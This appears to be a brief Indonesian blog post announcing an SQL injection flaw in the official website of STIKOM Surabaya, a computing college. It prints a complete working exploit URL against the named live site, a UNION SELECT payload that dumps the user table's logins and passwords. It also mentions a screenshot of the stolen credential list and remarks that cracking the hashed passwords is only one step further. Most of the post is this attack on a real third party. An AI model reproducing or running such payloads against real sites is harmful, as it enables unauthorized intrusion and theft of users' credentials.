STIKOM.EDU merupakan website resmi Sekolah Tinggi Manajemen Informatika dan Teknik Komputer Surabaya. Website tersebut berisi informasi kampus, program pendidikan, jadwal kegiatan, dan berita. Saat sedang melakukan “jalan-jalan rutin” ke situs-situs pendidikan minggu ini, saya menemukan celah SQL Injection. Parameter yang tidak disanitasi dengan baik dan kesalahan konfigurasi menyebabkan serangan ini mudah untuk dilakukan

Exploit

http://www.stikom.edu/v8/main.php?act=ber&tb=ext_news&id=-1+union+all+select+1,2,3,group_concat(login,0x2d2d,passwd),+5+from+user

Screenshot

Daftar username dan Password website STIKOM

Tinggal satu langkah lagi, password yang tersembunyi dibalik enkripsi bisa dengan mudah didapatkan